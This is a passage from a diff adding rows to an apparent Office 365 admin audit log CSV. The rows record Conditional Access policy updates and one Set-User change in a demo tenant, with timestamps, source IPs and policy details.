+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T11:04:11.860286Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 11:14:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:29:55Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:65030,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:29:54 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:31:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:31:08 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:27:44Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:27:44 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:27:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:27:14 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:27:45Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:27:44 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:25:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:25:00 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:33:22Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:33:22 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:31:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:31:07 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:30:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:30:30 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:33:22Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:42443,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:33:22 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:31:08Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:5162,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:31:07 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:30:31Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:43008,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:30:30 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:39:28Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:5205,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:39:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:39:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:39:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:59:59Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:64466,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:59:58 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T15:06:30Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T14:06:06Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:06:05 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:06:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:06:16 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:06:06Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:45273,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:06:05 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:06:16Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:56740,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:06:16 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:31:08Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:35158,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:31:08 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:27:44Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:63440,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:27:44 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:27:14Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:10628,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:27:14 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T14:27:45Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:18550,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:27:44 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
